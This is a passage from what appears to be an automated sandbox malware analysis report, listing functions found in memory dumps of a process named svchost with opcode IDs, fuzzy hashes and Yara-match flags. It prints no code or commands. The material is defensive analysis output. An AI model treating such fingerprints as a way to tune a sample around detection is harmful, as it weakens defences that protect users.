                                            • Instruction Fuzzy Hash: B56123B5A00605EFDB18DF68C580AADFBB5FF89304F18856FE519A7340DB35A941CB90
                                            Function 03AF92A6 Relevance: .2, Instructions: 174COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                            • Instruction ID: fdeef5b6294c43eaf4f615a99ca215fb3b358faf2350f8c4bcf4b3c5add0ea5d
                                            • Opcode Fuzzy Hash: 8259485a1ea8f193066365729dc68a009227554699174c79a4f0eb6877d7ec44
                                            • Instruction Fuzzy Hash: 1161DF352047428FD315DFA8C994B6BB7E4BF90708F18496EFA858B391DB35E806CB91
                                            Function 03AFCE93 Relevance: .2, Instructions: 172COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                            • Instruction ID: e166fbb1b322efa79da8d6305b759d37e86ded2fedeea4b75bfbf3b058a5a72f
                                            • Opcode Fuzzy Hash: adaef8c90542e90ae6fae2448e28977f4ff712f71b9da8e8631f75b3b546fe51
                                            • Instruction Fuzzy Hash: 8251143260430A5FC715DF6AC85076AFBE6AFC1260F19846FFA56CB349DA30D9098791
                                            Function 0040FF53 Relevance: .2, Instructions: 165COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                            • Instruction ID: 2948c7844e8bf5681bf2219b824e50f63151c4f0def850ce58ccbf78af4cf3ed
                                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                            • Instruction Fuzzy Hash: F05173B3E14A214BD3188E09CC40672B792FFD8312B5F81BEDD199B357CE74E9529A90
                                            Function 0040FF4A Relevance: .2, Instructions: 163COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d8aa76cd9b6fa723f73e48c9da151af4d29a30f3f846851fac07dd19d51dab1f
                                            • Instruction ID: 2a4a19197f1f17f370c336db2feae8dc01552859b7f15c9bc82f8b106427e0a0
                                            • Opcode Fuzzy Hash: d8aa76cd9b6fa723f73e48c9da151af4d29a30f3f846851fac07dd19d51dab1f
                                            • Instruction Fuzzy Hash: D05163B3E14A214BD318CE09CC40672B692FFD8312B5F81BEDD199B357CE74E9529A90
                                            Function 03A2B2D3 Relevance: .2, Instructions: 161COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                            • Instruction ID: b7cffca9b55cadc5ce182b24b595e6e4db7158a9e29d6fd6bafd6231a4bad012
                                            • Opcode Fuzzy Hash: 9c12643a38392e10fdb0d3792171c7647967daaf6fde20319a2825e8786a52da
                                            • Instruction Fuzzy Hash: DD412535600710AFCB25EF29DA80F2ABBA9EF44764F15456FE5599B790D770DC008BA0
                                            Function 03AF7D73 Relevance: .2, Instructions: 160COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                            • Instruction ID: 38db14aedf57af1314f5e5ca0520f7c6de744aa5ee7f235083505909804e4d3f
                                            • Opcode Fuzzy Hash: 7480d0718375433fc77a323c9cfb632dd1c865cf9543cdbf312060e9e6466656
                                            • Instruction Fuzzy Hash: 0951C136A1014A8FCB08CFA8C480AEEB7F1EF98314B19827ED915DB355E731DA15CB90
                                            Function 03A43740 Relevance: .2, Instructions: 159COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                            • Instruction ID: 14baf193abc821607c6d58d3f3da0c0bfcc6ca8cbab737ca72ca89da183d8a0b
                                            • Opcode Fuzzy Hash: 62e832910576d6adbed08cc2b47138aa1a01df0f93294633a789380cc6c25aa0
                                            • Instruction Fuzzy Hash: 54510579A00615AFCB11CF68C480769F7B4FF95710F0942AAE895DB780E734E9A1CBC0
                                            Function 03A37152 Relevance: .2, Instructions: 158COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                            • Instruction ID: a9b55d9b4565b88b3633d88ae5051021b05ab70c1e98395b23f42eed6828e350
                                            • Opcode Fuzzy Hash: 3de62753f094db0db477ed5fb30864175be209c4d3e01ee99ffb5e90afa4d9aa
                                            • Instruction Fuzzy Hash: C851E176A0060AEFEF15DF64C944BADB7F8BF46315F1441ABE402A76A0EB749911CF80
                                            Function 03AB3A6C Relevance: .2, Instructions: 156COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                            • Instruction ID: 477aaac31d32c0ad89f2ced593988b6425b949bd9d12c21f7d126f4d8b42c527
                                            • Opcode Fuzzy Hash: 28f25674bd7812529728c4a807f1b3a7aad6acb568bc368bb3341bdfd070c871
                                            • Instruction Fuzzy Hash: C9519E37E4012D4BEF24CA58D461BEFB3F6EB44310F48086AE849BB3C5C6B66A57D550
                                            Function 03AAD800 Relevance: .2, Instructions: 155COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                            • Instruction ID: 48871060aeace8029d0d9688ad1bb4a9ecd59f3ea998dffd3849c5886cd40752
                                            • Opcode Fuzzy Hash: 80d4643433773eaa82b24366a5f607725bdab2eb491ba1c22f0e916330656c0c
                                            • Instruction Fuzzy Hash: 9051DE75A00A15ABCB14DF6DC4A0ABEB7B4FF45700B0845AFE881DBB90E734D850CB90
                                            Function 03AFD26B Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction ID: c970e9fe573c1af63cd567b5c8aae5e67697c4d564573698d9fe539917759118
                                            • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                            • Instruction Fuzzy Hash: AE516E766087429FC716CFA8C884B5AB7E5FBC8344F048A2EFA948B344D734E905CB52
                                            Function 03AF7571 Relevance: .2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                            • Instruction ID: 68c30fc4fea65421fdc3a0ea6b39f371216c27a6d816228f390c1ece2cd57697
                                            • Opcode Fuzzy Hash: 0ddd4e82306d5514fffa1f1b30874c7f09d1d458be5fe5861797eb9008640ed2
                                            • Instruction Fuzzy Hash: 59510531A00219AFCB14DFA9C944A7EFBB9FF48384F08416AFA05D7250DB75AE11CB80
                                            Function 03A351ED Relevance: .1, Instructions: 149COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                            • Instruction ID: 42f7cc77a01b81686140aafccc28d2ad0fda692e3a207240d397009c148d56b2
                                            • Opcode Fuzzy Hash: 5fba3cbec30ef7f11953d733d1d9ba3a645fb0fbc9e6201e0af211e94a61101e
                                            • Instruction Fuzzy Hash: 0B518975E05314DFEF25DBA9C940BADB7B8AF0B358F18006BF811EB240D7B498408B52
                                            Function 03AB5BF0 Relevance: .1, Instructions: 145COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e13dc8d16d1cb1a6840996b3cec8f6a1cc87c01a5490f89f83da57e4cb875b4
                                            • Instruction ID: b3c6d7d034ce96a22f1688bb815cf9dba368ba350201802f4a1fbde138adb64a
                                            • Opcode Fuzzy Hash: 5e13dc8d16d1cb1a6840996b3cec8f6a1cc87c01a5490f89f83da57e4cb875b4
                                            • Instruction Fuzzy Hash: BA41F635E407549BCB25FFB49A06BEEBBB99F4B614B00077BE806EB352DA7488004791
                                            Function 03A6F71F Relevance: .1, Instructions: 143COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                            • Instruction ID: 9a282a144b54202e5bd0a708d7673d338cd7a61dfa54191f7d7ba09c24769ee9
                                            • Opcode Fuzzy Hash: abe8939629acf6f74f1629921e0e57b513a28d699f55ced77cb34f2c58e4a753
                                            • Instruction Fuzzy Hash: 8741947AD05229AFDF11EBA8D984ABFB6BCAF05654F05016BE900FB700D634DE4187E4
                                            Function 00401110 Relevance: .1, Instructions: 141COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8af01080758522a39898241571d893ef609c49707bfb05f8093e5662d029631f
                                            • Instruction ID: df4322cae28db401e667ffba55d7f677c3dd056570be3fa2b2c87e363da5f905
                                            • Opcode Fuzzy Hash: 8af01080758522a39898241571d893ef609c49707bfb05f8093e5662d029631f
                                            • Instruction Fuzzy Hash: 8231E773B0011A03DB2C845E9C9016AA65BD7E836576D827BEE19FF3E1E479ED1242C8
                                            Function 03A601F8 Relevance: .1, Instructions: 138COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                            • Instruction ID: cd74ec1f834fef3c3153543b04f7eb664e192176b9a14b5f8926dfacb357e63b
                                            • Opcode Fuzzy Hash: a13fe27dc36b64178cbd73f66f4d810b6ea9621728028c8166da154b9894bd6d
                                            • Instruction Fuzzy Hash: BD41AD369042149BCB14DFA8C440AEEF7B8BF88610F18816FE916EB340D7359C81CBA4
                                            Function 03A72750 Relevance: .1, Instructions: 137COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction ID: afcfc4699c94579a887cca113cd85968202e1e51533d46946c1a901978bf4a17
                                            • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                            • Instruction Fuzzy Hash: 96512B76A00615DFCB15CF58C580AAEF7F6FF84710F2885AAD855A7350D734AE81CB90
                                            Function 03AAD1C0 Relevance: .1, Instructions: 135COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction ID: e9a6f7041004389dff19125b2f7aa8799e1f285cd93d13f3fbc6f5400b0d7e94
                                            • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                            • Instruction Fuzzy Hash: C4512776A00606DFCB18CF68C4916AAFBF1FF48314B18856ED859A7745E734EA90CF90
                                            Function 03A36154 Relevance: .1, Instructions: 133COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                            • Instruction ID: 236daf51bb0c6ae78cf5fd7eb0101e8232631da74c31a31768f8dc81931cecfd
                                            • Opcode Fuzzy Hash: 2387cf2c5b78db35841b9efe40dfae152d7dbb73d2704d80f96d98a73893a910
                                            • Instruction Fuzzy Hash: 2E51F870904216EBDB29DB64CD44BE8BBB5EF02314F1842EBE429AB7D1E7785981CF40
                                            Function 03A2B136 Relevance: .1, Instructions: 131COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                            • Instruction ID: 71ee399c0f34915b535935543d96d3c8e727deaaaf8301294af87332d382f584
                                            • Opcode Fuzzy Hash: ef7d1b605d209e038ae8b93e532e6e9b02191fd236c340c03f71a01e6055b314
                                            • Instruction Fuzzy Hash: 8341AC75640311EFDB25EF68CA80B6ABBB8EF50794F04446BE9559B690E774D800CFA0
                                            Function 03AFF0E0 Relevance: .1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                            • Instruction ID: 64411042a8576488a333d1fa877dbe426e3e01269785eec26aed22b9841dbab5
                                            • Opcode Fuzzy Hash: 5e82f068e2f2f586f48d6c844784d22b7a51cb523507a4506aa1bcade9f7315d
                                            • Instruction Fuzzy Hash: B741D0712083418FD708CF65D8A497ABBE1EBD4315F088A5EF9D58B382C730D909CB61
                                            Function 03ADD5B0 Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                            • Instruction ID: 22a007878fb60635cccdfec5176d69b7744f50f8e29c92b4d960d46df4404588
                                            • Opcode Fuzzy Hash: 48c74ee4c5d5cec4b37b7ae190121a5aa55c03bc0b6d38ced6f1a9704ab9af32
                                            • Instruction Fuzzy Hash: 0541F330A182959FCB14DF29C495ABAFBF1FF49304F09849EE4C68F245C739A456DBA0
                                            Function 03A5D6E0 Relevance: .1, Instructions: 126COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                            • Instruction ID: 96665835fd596636859ec5ef78f3c4ef373738e8a1d8b4dfa067c19582c2ddd9
                                            • Opcode Fuzzy Hash: 557f067e558d842146512f298a608c81dcb2e9df9331c59b11733928417bc36b
                                            • Instruction Fuzzy Hash: C041B17A6043009FD734EF25CA90F6AB7E8EB55325F04062FF9159B791DB30A841CB91
                                            Function 03A2A020 Relevance: .1, Instructions: 122COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction ID: 85605252fdda36095df2e9976601e6e6b09bb849c7cbac62f9e63c5e19e2bf0c
                                            • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                            • Instruction Fuzzy Hash: E9411831A08225DFDB24EFA985507BAFB72EB90754F19806FE9459B340DA35DD80CBA0
                                            Function 03A60710 Relevance: .1, Instructions: 121COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction ID: 156c34da78cfa37cd22670eaf5e2b5fe98b70a5d4b7a42969d9e23d2a21a96d1
                                            • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                            • Instruction Fuzzy Hash: 85412E75A04705EFDB24CFA9C980AAAB7F8FF19700B10496EE556DB690D730EA84CF50
                                            Function 03A3262C Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                            • Instruction ID: 615f5e7d0505f0bed8799da86aaec5dcd9c9417d71e83394ee427c0df1ec41e0
                                            • Opcode Fuzzy Hash: e0cb7fe9442b40dcd26970f5b1be242c54c9567b217bbdc7f8f4ae0b29bdfe9a
                                            • Instruction Fuzzy Hash: 4341EE75901714CFCB21EF28DA40B69B7B5FF86314F148AAFE4169B7A0EB309941CB40
                                            Function 03AFFFB1 Relevance: .1, Instructions: 117COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                            • Instruction ID: 5eaa930af206372ec4c1c91922ee5680cba4040d3b7b44f758a32d8076ba939c
                                            • Opcode Fuzzy Hash: 6c99b14e06c4aaadc6873958652cedf5628644bc831ec42239f22f5d7dee6f27
                                            • Instruction Fuzzy Hash: 6F413831A042595BD740DB2685A0ABABFF1EF85209F0CC1FAD8C1DB286E639C506C770
                                            Function 03AB07C3 Relevance: .1, Instructions: 114COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                            • Instruction ID: dab232aaa158c20a5d6b7e951c0925530377887a9f5b6434fa6a72b5a524b4a8
                                            • Opcode Fuzzy Hash: ee9f20dfa75fcb94340cb645a87c0e383c330c020f1aa502f44ae28e523721a0
                                            • Instruction Fuzzy Hash: EA417C76508304AFD320EF69C945B9BBBE8FF88664F004A2FF998D7251D7709905CB92
                                            Function 03AFFA49 Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                            • Instruction ID: 7f0f85ee54c370ddac50931d314be29eeb5bf6057356eb64217508eb3eafa56f
                                            • Opcode Fuzzy Hash: 07f1b816e10b4df0c9ca3f7891afbf7c3364f832b540bc2d0d44f92a33f6ff88
                                            • Instruction Fuzzy Hash: 803159367001069FC718DF69CC44AA3BBA9EF84710F08867AFA18CB385E774D945C390
                                            Function 03AFEEDB Relevance: .1, Instructions: 113COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                            • Instruction ID: 895409a17e050800ff0593ef7eca4f004c4270f221cf4b06a4151439ddee1234
                                            • Opcode Fuzzy Hash: db51585a54c2106c8cea4439f873848eaa7a3c032944ca4384e6e1da048bfa08
                                            • Instruction Fuzzy Hash: 5A418433E0412A8FCB18DF68D59197AF7F5FB4830475642BEE905AB294DB34AE05CB90
                                            Function 03AFFB76 Relevance: .1, Instructions: 109COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2014186824.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_3a00000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                            • Instruction ID: 70f1bd8bc3b8287fa12f6188ef22cde2e920661b248cb4387545c364394762ba
                                            • Opcode Fuzzy Hash: 99df16872ca346521ff76e8fd0c288bf1e648b919504b48b970d90989db0cb42
                                            • Instruction Fuzzy Hash: C631F436610115AFD714DFA9CD48AABBBF5EF88354F44857AFA08CF244D634E902C790
                                            Function 0040E1F3 Relevance: .1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2013386814.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                            • Instruction ID: 449cbb033e18bc5494fa5d8299c778f24dcbc03eaae3a15f81fb9c39cbc74c19
                                            • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                            • Instruction Fuzzy Hash: 4C3193116586F10DD30E836D08BD675AEC18E5720174EC2FEDADA6F2F3C0888418D3A5
                                            Function 03A402E1 Relevance: .1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Memory Dump Source
